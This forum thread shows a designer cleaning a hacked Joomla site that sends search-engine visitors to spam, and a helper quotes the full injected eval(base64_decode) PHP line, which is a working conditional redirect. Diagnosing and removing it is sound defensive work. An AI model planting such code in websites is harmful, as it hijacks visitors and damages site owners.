Categories: Malware & hacked sites :

HELP! Possible 302 hijack for client site

Showing 1-16 of 16 messages
HELP! Possible 302 hijack for client site designcouch 7/6/12 7:07 AM
My client's site has been the victim of a possible 302 hijack. Searching for "Frederick Living" brings up their results (www.frederick-mennonite.org) but when the links are clicked, pages from the bee.edns.biz domain are shown. This is an unrelated site, and contains spam targeted at the market that my client's site is focused on (retirees). PLEASE HELP! I am in the middle of coding a new site for them, and need this rectified so that Google will index the new site when it launches.
Re: HELP! Possible 302 hijack for client site kravman85 7/7/12 9:09 AM
I'm having the exact same problem as well. I'm going to try refreshing/flushing dns, new primary domain, then if all else fails contacting the hosting company. Remember to use best practices and I typically ban any out of country IP address.
Re: HELP! Possible 302 hijack for client site webado 7/7/12 9:28 AM
Actually it's not hijacked.

The website has been hacked with a conditional hack that redirects to the other possibly malicious site. That might be done through javascript so all internal js files and on-page js code need to be check and all external js files can be considered suspect.
Re: HELP! Possible 302 hijack for client site designcouch 7/7/12 10:18 AM
Unless the site hack is dependent on the user arriving from a search engine, this is not the case, as navigating directly to their site doesn't result in a redirect.
Re: HELP! Possible 302 hijack for client site webado 7/7/12 10:29 AM
I said it's a conditional hack - and that it appears to be through javascript.
Re: HELP! Possible 302 hijack for client site designcouch 7/9/12 6:47 AM
Thank you for your response, webado. I'm poring over the site's javascript (on page and internal) files looking for the inserted code. The only external files are direct links to the Google code library (specifically the jQuery library). Can I consider those secure?
Re: HELP! Possible 302 hijack for client site redleg-redleg 7/9/12 6:53 AM
Check your site for some obfuscated php code, a line that starts out like this

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlY  ...........

the string of seemingly random characters will be pretty long.  Start with your homepage the files includes/defines.php and /configuration.php are also possibilities.
Re: HELP! Possible 302 hijack for client site designcouch 7/9/12 6:58 AM
Redleg,

That line of code appears to be in the index.php file of my site. Should deleting it solve the issue?
Re: HELP! Possible 302 hijack for client site redleg-redleg 7/9/12 7:19 AM
Yes, you need to remove that line.  Just to be sure here is the entire line

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkc
WF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfV
VNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3Rya
XN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicm
FtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3Rya
XN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIn
dlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG
9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Ig
cHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2
ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvb
SIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0Ka
WYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRl
cigiTG9jYXRpb246IGh0dHA6Ly9waW9wby4yNXUuY29tLyIpOw0KZXhpdCgpOw0KfQp9DQp9DQp9DQp9")); //

Also unfortunately with this hack that line of code is placed in multiple files on the site so you will need to check any files named index.php and the core files includes/defines.php and /configuration.php    If present it will be the same line in all the files.
Re: HELP! Possible 302 hijack for client site designcouch 7/9/12 7:36 AM
Redleg,

Yeah - I'd started looking into everything on the site, and it appears that most .php files are affected. It looks like I have a long day ahead of me deleting and re-saving files. In your experience, would re-installing Joomla be a viable solution?
Re: HELP! Possible 302 hijack for client site redleg-redleg 7/9/12 7:42 AM
If you have a lot of individual files to clean up then it would probably end up being faster in the long run to re-install Joomla.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 9:33 AM
Red Leg,

I have re-installed Joomla AND restored the site from a backup from last year. All of the base64 code that was inserted is gone. However, search engines are still forwarding the site to the spam pages. Do you have any thoughts? Does it just take a while for my changes to propagate? I was under the impression that the results should be instant.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 9:56 AM
I have also done a basic process inspection when clicking on the link from Google. This confirms that the hack is a 302 redirect, as initially suspected. I have included a screenshot of this process - note the status on the very top entry (the "frederick-mennonite.org" url). 


Re: HELP! Possible 302 hijack for client site redleg-redleg 7/10/12 11:05 AM
Unfortunately there is still something wrong, a lingering hack somewhere that did not get overwritten.   There is a listing for a simple script at

http://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html

You copy and paste the script into a file then upload it to your server then open it in a browser.  The script will scan your files for any occurrences of the string base64 and echo the path/filename to the browser.  You might try running that and see if it finds anything.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 12:29 PM
Thanks Red Leg - that allowed me to locate the rest. Will update on whether or not it was successful.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 1:34 PM
Final update - consider this issue closed. Red Leg's script helped me locate the last few files. Search results are now functioning just as they should. Thanks all!